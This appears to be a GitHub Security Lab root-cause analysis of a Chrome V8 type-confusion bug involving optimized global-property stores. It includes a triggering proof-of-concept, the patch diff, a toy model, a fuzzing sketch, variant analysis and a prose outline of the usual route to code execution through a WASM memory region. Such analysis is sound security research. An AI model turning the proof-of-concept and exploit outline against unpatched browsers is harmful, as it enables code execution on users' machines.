Man Yue Mo, GitHub Security Lab

The Basics

Disclosure or Patch Date: 13 September 2021

Product: Google Chrome

Advisory: https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html

Affected Versions: pre 93.0.4577.82

First Patched Version: 93.0.4577.82

Issue/Bug Report: https://bugs.chromium.org/p/chromium/issues/detail?id=1247763

Patch CL: https://source.chromium.org/chromium/_/chromium/v8/v8.git/+/6391d7a58d0c58cd5d096d22453b954b3ecc6fec

Bug-Introducing CL: N/A

Reporter(s): Anonymous

The Code

Proof-of-concept (the % intrinsics require running d8 with --allow-natives-syntax):

function store(y) {
  x = y;
}

function load() {
  return x.b;
}

var x = {a : 1};
var x1 = {a : 2};
var x2 = {a : 3};
var x3 = {a : 4};

store(x1);
%PrepareFunctionForOptimization(store);
store(x2);

x1.b = 1;

%OptimizeFunctionOnNextCall(store);
store(x2);

x.b = 1;

%PrepareFunctionForOptimization(load);
load();

%OptimizeFunctionOnNextCall(load);
load();

store(x3);

%DebugPrint(load());

Exploit sample: N/A

Did you have access to the exploit sample when doing the analysis? N/A

The Vulnerability

Bug class: Type confusion

Vulnerability details: Optimized code that stores to a global property is not deoptimized when the map of the property's value changes, leading to type confusion.

Prior to the patch, when TurboFan compiles a store to a global property whose property cell has the kConstantType attribute (i.e. the type of the stored value has not changed), it inserts DependOnGlobalProperty (1. below) and CheckMaps (2. below) to ensure that the store does not change the map of the value held in the property cell:

     case PropertyCellType::kConstantType: {
        ...
        dependencies()->DependOnGlobalProperty(property_cell);         //<------------ 1.
        ...
        if (property_cell_value.IsHeapObject()) {
          MapRef property_cell_value_map =
              property_cell_value.AsHeapObject().map();
          if (property_cell_value_map.is_stable()) {
            dependencies()->DependOnStableMap(property_cell_value_map);
          } else {
            ... //<----- fall through
          }
          // Check that the {value} is a HeapObject.
          value = effect = graph()->NewNode(simplified()->CheckHeapObject(),
                                            value, effect, control);
          // Check {value} map against the {property_cell_value} map.
          effect = graph()->NewNode(                                //<------------ 2.
              simplified()->CheckMaps(
                  CheckMapsFlag::kNone,
                  ZoneHandleSet<Map>(property_cell_value_map.object())),
              value, effect, control);

However, when the map of the global property's value (property_cell_value_map) is changed in place after the code is compiled, the optimized code is deoptimized only if property_cell_value_map was stable at compile time, because only then is DependOnStableMap registered. So, for example, if a function store is optimized while the map of the global property x is unstable:

function store(y) {
  x = y;
}

Then an in-place change to the map of x will not deoptimize the compiled store:

x.newProp = 1;   //<------ x now has a new map, but the optimized store still assumes the old map

The map that the optimized store function assumes for x is now stale. Another function load can now be compiled to access newProp from x:

function load() {
  return x.newProp;
}

The optimized load will assume x to have a new map with newProp as a property.

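If the optimized store is now used to store an object with the old map back to x, the object passes the CheckMaps check against the old map and the cell type is left unchanged, so load is not deoptimized. The next time load is called, a type confusion occurs because load still assumes x has the new map.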
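The sequence above can be imitated with a small toy model in plain JavaScript. This is only a sketch under stated assumptions: ToyMap, ToyObject, compileStore, compileLoad and runScenario are hypothetical names invented for illustration, not V8 APIs, and the "compiled code" is just a closure with a validity flag. It shows why the store survives the in-place map change only when the old map was already unstable at compile time.

```javascript
// Toy model only: ToyMap, ToyObject, compileStore and compileLoad are
// hypothetical stand-ins for V8 internals, not real V8 APIs.
class ToyMap {
  constructor(fields) {
    this.fields = fields;          // ordered field names, e.g. ["a", "b"]
    this.stable = true;            // stable until the map gains a transition
    this.transitions = new Map();  // field name -> successor ToyMap
    this.dependents = [];          // compiled code relying on stability
  }
  // Adding a field moves an object to a successor map. The source map
  // becomes unstable, which invalidates code that depended on its stability.
  transition(name) {
    if (!this.transitions.has(name)) {
      this.transitions.set(name, new ToyMap([...this.fields, name]));
    }
    this.stable = false;
    for (const code of this.dependents) code.valid = false;
    this.dependents.length = 0;
    return this.transitions.get(name);
  }
}

class ToyObject {
  constructor(map, slots) { this.map = map; this.slots = slots; }
  addField(name, value) {
    this.map = this.map.transition(name);
    this.slots.push(value);
  }
}

// Pre-patch store: checks the incoming value against the map seen at compile
// time, but registers a stability dependency only if that map was stable.
function compileStore(cell) {
  const expected = cell.value.map;
  const code = {
    valid: true,
    run(v) {
      if (v.map !== expected) throw new Error("CheckMaps failed");
      cell.value = v;
    },
  };
  if (expected.stable) expected.dependents.push(code);
  return code;
}

// Load specialized for the current map: reads a fixed slot with no map check.
function compileLoad(cell, name) {
  const expected = cell.value.map;
  const index = expected.fields.indexOf(name);
  const code = { valid: true, index, run: () => cell.value.slots[index] };
  expected.dependents.push(code);
  return code;
}

function runScenario(oldMapUnstableAtCompileTime) {
  const m0 = new ToyMap(["a"]);
  const [x1, x2, x3] = [2, 3, 4].map((v) => new ToyObject(m0, [v]));
  const cell = { value: x2 };                 // the global x holds x2
  if (oldMapUnstableAtCompileTime) x1.addField("b", 1);
  const store = compileStore(cell);
  x2.addField("b", 1);                        // in-place map change of x
  const load = compileLoad(cell, "b");
  if (!store.valid) return "store deoptimized";
  store.run(x3);                              // x3 still has the old map
  return load.index >= cell.value.slots.length
    ? "load reads past the end of x3"
    : "ok";
}

console.log(runScenario(false)); // prints "store deoptimized"
console.log(runScenario(true));  // prints "load reads past the end of x3"
```

In the model the stale read merely yields an out-of-range slot index; in the real engine the equivalent access reads memory beyond the object's fields.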

Patch analysis:

@@ -804,6 +804,12 @@
       return NoChange();
     } else if (property_cell_type == PropertyCellType::kUndefined) {
       return NoChange();
+    } else if (property_cell_type == PropertyCellType::kConstantType) {
+      // We rely on stability further below.
+      if (property_cell_value.IsHeapObject() &&
+          !property_cell_value.AsHeapObject().map().is_stable()) {
+        return NoChange();
+      }
     }
   } else if (access_mode == AccessMode::kHas) {
     DCHECK_EQ(receiver, lookup_start_object);
@@ -922,17 +928,7 @@
         if (property_cell_value.IsHeapObject()) {
           MapRef property_cell_value_map =
               property_cell_value.AsHeapObject().map();
-          if (property_cell_value_map.is_stable()) {
-            dependencies()->DependOnStableMap(property_cell_value_map);
-          } else {
-            // The value's map is already unstable. If this store were to go
-            // through the C++ runtime, it would transition the PropertyCell to
-            // kMutable. We don't want to change the cell type from generated
-            // code (to simplify concurrent heap access), however, so we keep
-            // it as kConstantType and do the store anyways (if the new value's
-            // map matches). This is safe because it merely prolongs the limbo
-            // state that we are in already.
-          }
+          dependencies()->DependOnStableMap(property_cell_value_map);
 
           // Check that the {value} is a HeapObject.
           value = effect = graph()->NewNode(simplified()->CheckHeapObject(),

After the patch, the JIT compiler bails out when property_cell_type is kConstantType and property_cell_value_map is unstable. The remaining path always registers DependOnStableMap, which ensures that optimized code for storing global properties is deoptimized if the map of the property cell's value changes.
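The condition added by the first hunk can be restated as a small predicate. The following is a hedged sketch in plain JavaScript, not V8 code: CellType, storeBailsOut and the { map: { stable } } object shape are hypothetical stand-ins chosen for illustration, and a non-object value plays the role of a non-HeapObject (Smi) cell value.

```javascript
// Hypothetical stand-ins for V8's PropertyCellType and map stability bit.
const CellType = Object.freeze({
  kConstantType: "kConstantType",
  kMutable: "kMutable",
});

// Mirrors the added check: a store to a kConstantType cell is left
// unoptimized when the current value is a heap object with an unstable map.
function storeBailsOut(cellType, cellValue) {
  const isHeapObject = typeof cellValue === "object" && cellValue !== null;
  return (
    cellType === CellType.kConstantType &&
    isHeapObject &&
    !cellValue.map.stable
  );
}

const unstable = { map: { stable: false } };
const stable = { map: { stable: true } };
console.log(storeBailsOut(CellType.kConstantType, unstable)); // prints true
console.log(storeBailsOut(CellType.kConstantType, stable));   // prints false
console.log(storeBailsOut(CellType.kConstantType, 7));        // prints false
```

Bailing out early, rather than emitting code without a stability dependency, is what lets the second hunk call DependOnStableMap unconditionally.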

Thoughts on how this vuln might have been found (fuzzing, code auditing, variant analysis, etc.):

Although the affected code deliberately diverges from the runtime behaviour (as the removed comment explains), it is not obvious that this divergence is a problem. Even after seeing the release notes and knowing that the issue was exploitable, it took me a good few hours to work out how it could be exploited, and that level of effort is not feasible for every piece of code.

It may also be possible to find this type of bug by fuzzing, given the simplicity of the proof-of-concept included above. The main complication is perhaps the need for two optimized functions to interact, and for each optimization to happen at exactly the right point. The ingredients required for generating this type of test case (optimization of multiple functions and having multiple objects at different stages of the transition tree) are somewhat similar to those of CVE-2020-16009, so perhaps similar fuzzing techniques can be applied to both cases.
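As a rough illustration of those ingredients, a template-based generator could interleave global stores and loads, property additions and optimization requests. The sketch below is hypothetical: makeRng, generateTestCase and the template itself are invented for this example, and nothing here claims to be how the bug was actually found. It only produces source text, which would then be run in d8 with --allow-natives-syntax.

```javascript
// Hypothetical generator sketch: names and template are illustrative only.
// Small seeded generator so that an interesting test case can be regenerated.
function makeRng(seed) {
  let state = seed >>> 0;
  return () => {
    state = (state * 1664525 + 1013904223) >>> 0;
    return state / 2 ** 32;
  };
}

function generateTestCase(rng, steps) {
  const pick = (items) => items[Math.floor(rng() * items.length)];
  const objects = ["o0", "o1", "o2"];
  const calls = {
    store: () => `store(${pick(objects)});`,
    load: () => "load();",
  };
  // Fixed prelude: one global, several objects sharing its initial map,
  // and the two functions that will be optimized independently.
  const lines = [
    "var g = {a: 1};",
    ...objects.map((name, i) => `var ${name} = {a: ${i + 2}};`),
    "function store(y) { g = y; }",
    "function load() { return g.b; }",
  ];
  const actions = [
    () => [calls.store()],
    () => [calls.load()],
    () => [`${pick(objects)}.b = 1;`], // advance one object in the transition tree
    () => ["g.b = 1;"],                // in-place map change of the global's value
    () => {                            // optimize one of the two functions
      const fn = pick(["store", "load"]);
      return [
        `%PrepareFunctionForOptimization(${fn});`,
        calls[fn](),
        `%OptimizeFunctionOnNextCall(${fn});`,
        calls[fn](),
      ];
    },
  ];
  for (let i = 0; i < steps; i++) lines.push(...pick(actions)());
  lines.push("load();");
  return lines.join("\n");
}

console.log(generateTestCase(makeRng(1), 8));
```

A seeded generator is used so that any crashing output can be reproduced from its seed; a real fuzzer would need far richer templates and a crash oracle.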

(Historical/present/future) context of bug:

This bug lies at the intersection of the map transition/deprecation and property access (in particular, field tracking) mechanisms. Both are fairly complex, and various vulnerabilities have been found in them in the past. For example:

Some vulnerabilities in property access:

Some vulnerabilities in map transition/deprecation:

The Exploit

(The terms exploit primitive, exploit strategy, exploit technique, and exploit flow are defined here.)

Exploit strategy (or strategies):

The proof-of-concept included is already capable of causing out-of-bounds access in JavaScript. To exploit the bug more readily, JavaScript arrays can be used instead of JavaScript objects, which leads to a type confusion between arrays of different element types and causes out-of-bounds access in JavaScript arrays. Once that is achieved, the exploit is fairly standard. I've written an article with more details of the exploit strategy.

Exploit flow:

The exploit follows the standard flow for V8 exploits:

  1. Uses the initial relative read/write primitive to construct an absolute read/write primitive by corrupting a TypedArray object.
  2. Uses the absolute read/write primitive to overwrite the body of a WebAssembly function, which is stored in an RWX region, with the payload.
  3. Calls the WASM function.

Known cases of the same exploit flow: Virtually all V8 exploits in the past 5 years.

Part of an exploit chain?

This is unclear to me, as I have no context beyond what is publicly available. However, the release notes show that a sandbox escape bug also believed to be exploited in the wild (CVE-2021-30633) was patched in the same release and was reported on the same day, also by someone who wished to remain anonymous. It therefore seems likely that both bugs were used in an exploit chain to fully compromise Chrome.

The Next Steps

Variant analysis

Areas/approach for variant analysis (and why):

As this vulnerability is closely related to how the field type is used in property access, an obvious source of possible variants is ordinary property access ("named property" access), which may suffer from similar problems. As it turns out, instead of using a property cell, named property access uses the field map in property descriptors for map inference. Although it is possible to optimize code with an unstable field map in a property descriptor and use it to store named properties (similar to the store function that is optimized for this bug), it does not seem to be possible to change the field map in a property descriptor without reassigning the property, which would deoptimize the function. As such, I was not able to trigger similar problems with named property access.

This does, however, indicate an inconsistency in the treatment of the field map between property descriptors and property cells: the field map in a property cell is always in sync with that of the actual property value, while the field map in a property descriptor may not be. As such, care must be taken not to mix the two when accessing properties in the JIT compiler. At the time of writing, property cells only seem to be used for global property access, and I am unable to compile JIT code that accesses global properties through property descriptors, due to the access check requirement for global properties and the fact that the global object uses a dictionary map. If this changes in the future, or if unexpected ways to access global properties through property descriptors in JIT-compiled code are found, those cases should be examined carefully to avoid similar bugs.

Found variants: N/A

Structural improvements

What are structural improvements such as ways to kill the bug class, prevent the introduction of this vulnerability, mitigate the exploit flow, make this type of vulnerability harder to exploit, etc.?

Ideas to kill the bug class:

Ideas to mitigate the exploit flow:

Other potential improvements:

0-day detection methods

What are potential detection methods for similar 0-days? Meaning are there any ideas of how this exploit or similar exploits could be detected as a 0-day?

Other References